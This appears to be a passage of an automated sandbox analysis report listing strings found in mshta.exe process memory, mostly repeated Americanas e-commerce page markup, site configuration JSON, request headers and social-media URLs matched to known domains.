http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000000.00000003.25432653500.0000000009C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sacola.americanas.com.br/filler-v2Descontos progressivos. Leve mais, pague menoshttps://www.youtube.com/user/CanalAmericanasCadastro de Prote equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.25377202169.000000000B654000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanas equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanas* equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanasL equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.25399279067.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486225741.000000000A95D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanasz equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000002.25484225410.0000000009487000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/CanalAmericanas equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.25443295751.00000000093E4000.00000004.00000020.00020000.00000000.sdmp, gtm[1].js.0.drString found in binary or memory: return b}VD.F="internal.enableAutoEventOnTimer";var Vb=wa(["data-gtm-yt-inspected-"]),XD=["www.youtube.com","www.youtube-nocookie.com"],YD,ZD=!1; equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000002.25490167315.000000000B710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395304975.000000000B70F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.com0 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w$; equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w$; equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w$; equals www.youtube.com (Youtube)
